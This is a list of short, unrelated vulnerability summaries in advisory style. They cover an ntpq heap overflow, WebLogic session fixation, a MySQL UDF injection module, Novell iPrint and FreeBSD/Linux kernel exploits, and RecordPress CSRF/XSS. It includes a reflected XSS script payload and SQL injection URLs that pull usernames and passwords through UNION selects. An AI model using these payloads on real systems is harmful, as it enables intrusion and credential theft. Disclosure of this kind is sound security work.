There is a local heap overflow in the ntpq utility client that comes packaged in ntp-4.2.6p1-2.fc13. The binary is NOT suid/guid enabled on the system. Nonetheless, it provides some fun/interesting analysis.
Oracle WebLogic servlet session cookie can be fixated via HTTP POST request. This type of session fixation attack has been confirmed with different session descriptor elements. In particular, the attack has also been confirmed with the session descriptor element <url-rewriting-enabled> set to 'False'. Such setting prevents session fixation attack via HTTP GET request but fails to mitigate session fixation attacks performed over HTTP POST.
This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.
This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.
The value of the ctl00%24MPH%24wucContactInfo%24txtEmailAddress_SettingText request parameter submitted to the URL /Main/frmContact.aspx is copied into the HTML document as plain text between tags at the URL /Main/frmPopupContactsList.aspx. The payload 9e8e5<script>alert(1)</script>5b211c9e81 was submitted in the ctl00%24MPH%24wucContactInfo%24txtEmailAddress_SettingText parameter. This input was returned unmodified in a subsequent request for the URL /Main/frmPopupContactsList.aspx.
An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. The malicious queries can be sent through the 'ctf' parameter of the 'products.php' page. An attacker can use the 'UNION' operator to retrieve data from the database. For example, an attacker can use the following URL to retrieve data from the 'users' table: http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users
This vulnerability allows an attacker to inject malicious SQL code into the vulnerable web application. The vulnerable web application is designed by LUCH and is hosted on http://www.luch.co.il. The vulnerability was discovered by p0pc0rn and affects the page.asp, cat.asp, and catin.asp pages. The attacker can inject malicious SQL code into the vulnerable web application by appending the code to the URL. For example, the attacker can inject the code 'union select 1 from test.a' to the URL http://site.com/page.asp?id=23.
This exploit triggers CVE-2010-4165, a divide by zero error in net/ipv4/tcp.c. Because this is on the softirq path, the kernel oopses and then completely dies with no chance of recovery.
This is an exploit for CVE-2008-5736, the FreeBSD protosw and loosely based on Don Bailey's 2008 exploit. It reliably works on kernels on or below 6.4-RELEASE. It's an oldie, but simple enough that someone needed to write another PoC exploit at some point.
A CSRF vulnerability exists in RecordPress 0.3.1 which allows an attacker to change the admin password. An XSS vulnerability also exists which allows an attacker to inject malicious JavaScript code into the application.
Services By CQR